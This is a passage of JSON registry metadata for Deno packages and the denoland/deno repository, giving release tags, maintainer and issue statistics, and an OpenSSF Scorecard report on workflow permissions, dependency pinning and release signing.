","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T07:00:04.447Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":30.80506352090282,"dependent_packages_count":44.04104293311412,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":37.42305322700847},"purl":"pkg:maven/org.mvnpm.at.deno/darwin-arm64","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/maven/org.mvnpm.at.deno:darwin-arm64","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/maven/org.mvnpm.at.deno:darwin-arm64","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/maven/org.mvnpm.at.deno:darwin-arm64/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-arm64/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-arm64/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-arm64/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-arm64/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-arm64/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages/org.mvnpm.at.deno:darwin-arm64/codemeta","maintainers":[],"registry":{"name":"repo1.maven.org","url":"https://maven-central.storage-download.googleapis.com/maven2","ecosystem":"maven","default":true,"packages_count":620154,"maintainers_count":0,"namespaces_count":82381,"keywords_count":36851,"github":"maven-central","metadata":{"funded_packages_count":48065,"rate_limit":2},"icon_url":"https://github.com/maven-central.png","created_at":"2022-07-21T16:40:13.074Z","updated_at":"2026-09-01T05:04:44.165Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/repo1.maven.org/namespaces"}},{"id":4047296,"name":"deno_crypto","ecosystem":"cargo","description":"Web Cryptography API implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":276,"first_release_published_at":"2020-10-14T14:56:09.501Z","latest_release_published_at":"2026-08-06T11:47:45.788Z","latest_release_number":"0.271.0","last_synced_at":"2026-08-29T21:56:53.426Z","created_at":"2022-04-12T09:59:31.623Z","updated_at":"2026-08-29T21:56:53.427Z","registry_url":"https://crates.io/crates/deno_crypto/","install_command":"cargo install deno_crypto","documentation_url":"https://docs.rs/deno_crypto/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies 